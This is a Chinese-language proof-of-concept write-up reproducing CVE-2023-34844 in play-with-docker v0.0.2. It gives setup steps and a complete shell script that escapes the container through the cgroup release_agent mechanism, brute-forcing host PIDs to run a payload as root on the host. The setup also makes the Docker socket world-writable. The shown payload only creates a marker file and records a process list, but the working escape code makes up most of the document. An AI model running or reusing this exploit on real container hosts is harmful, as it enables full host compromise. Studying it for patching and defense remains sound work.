參考資訊:
https://nvd.nist.gov/vuln/detail/CVE-2023-34844
https://www.cvedetails.com/cve/CVE-2023-34844/
https://hacku.top/wl/?id=MACBtnorZyp6hC3E5bw2CqBAusuWoKe3
https://github.com/play-with-docker/play-with-docker/tree/v0.0.2
測試環境:
Ubuntu 20.04 (5.11.0-34-generic)
Docker version 20.10.25, build 20.10.25-0ubuntu1~20.04.2
測試步驟:
1. 在Host上執行如下命令
$ cd $ curl -LO https://storage.googleapis.com/golang/go1.7.linux-amd64.tar.gz $ sudo rm -rf /usr/local/go $ sudo tar -C /usr/local -xvzf go1.7.linux-amd64.tar.gz $ cd $ git clone --depth=1 https://github.com/play-with-docker/play-with-docker -b v0.0.2 $ cd play-with-docker $ sudo chmod 0777 /var/run/docker.socket $ docker run hello-world $ sudo modprobe xt_ipvs $ docker swarm init $ docker pull franela/dind $ go mod vendor $ docker-compose up pwd | 2023/10/10 05:30:46 Updating playgrounds configuration pwd | 2023/10/10 05:30:46 Listening on port 3000
2. 開啟FireFox並且輸入localhost
3. ADD NEW INSTANCE
4. vim run.sh
#!/bin/sh OUTPUT_DIR="/" MAX_PID=65535 CGROUP_NAME="xyx" CGROUP_MOUNT="/tmp/cgrp" PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" OUTPUT_NAME="${CGROUP_NAME}_payload.out" OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" # Run a process for which we can search for (not needed in reality, but nice to have) sleep 10000 & # Prepare the payload script to execute on the host cat > ${PAYLOAD_PATH} << __EOF__ #!/bin/sh OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} # Commands to run on the host< touch /tmp/cve-2023-34844 ps -eaf > \${OUTPATH} 2>&1 __EOF__ # Make the payload script executable chmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller mkdir ${CGROUP_MOUNT} mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses TPID=1 while [ ! -f ${OUTPUT_PATH} ] do if [ $((${TPID} % 100)) -eq 0 ] then echo "Checking pid ${TPID}" if [ ${TPID} -gt ${MAX_PID} ] then echo "Exiting at ${MAX_PID} :-(" exit 1 fi fi # Set the release_agent path to the guessed pid echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent # Trigger execution of the release_agent sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" TPID=$((${TPID} + 1)) done # Wait for and cat the output sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH}
5. 執行
[node1] (local) root@10.0.3.4 ~ $ chmod a+x ./run.sh [node1] (local) root@10.0.3.4 ~ $ ./run.sh
6. 在Host上查看結果
$ ls /tmp/ cve-2023-34844